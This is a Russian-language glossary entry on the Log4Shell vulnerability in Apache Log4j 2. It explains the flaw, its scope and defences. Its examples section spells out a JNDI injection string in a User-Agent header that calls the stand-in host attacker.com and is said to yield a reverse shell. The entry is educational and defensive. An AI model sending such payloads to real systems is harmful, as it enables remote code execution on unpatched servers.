CyberGlossary

Уязвимости

Log4Shell (CVE-2021-44228)

Также известно как: CVE-2021-44228, Уязвимость Log4j

Определение

Критическая уязвимость удалённого выполнения кода в Apache Log4j 2, раскрытая в декабре 2021 года: для эксплуатации достаточно было залогировать строку JNDI-поиска.

Log4Shell — уязвимость с CVSS 10.0 в Apache Log4j 2 (версии 2.0-beta9 – 2.14.1), раскрытая в декабре 2021 года. Функция message lookup интерпретировала строки вида ${jndi:ldap://...} в сообщениях логов, заставляя JVM загружать и десериализовать удалённый Java-класс — что давало RCE. Log4j встроен в бесчисленные Java-приложения и устройства, поэтому любой ввод, попадавший в лог (User-Agent, строка поиска, имя файла), становился вектором. Это вызвало глобальную аварийную кампанию обновлений и стало одной из самых эксплуатируемых 0-day. Защита: обновление Log4j до 2.17.1+, отключение JNDI-lookups, блокировка egress, использование SBOM для поиска уязвимых компонентов.

Примеры

  • Отправка заголовка User-Agent: ${jndi:ldap://attacker.com/x} в Java-приложение и получение reverse shell.
  • Эксплуатация внутреннего Java-сервиса через злонамеренное имя пользователя, попадающее в лог.

Связанные термины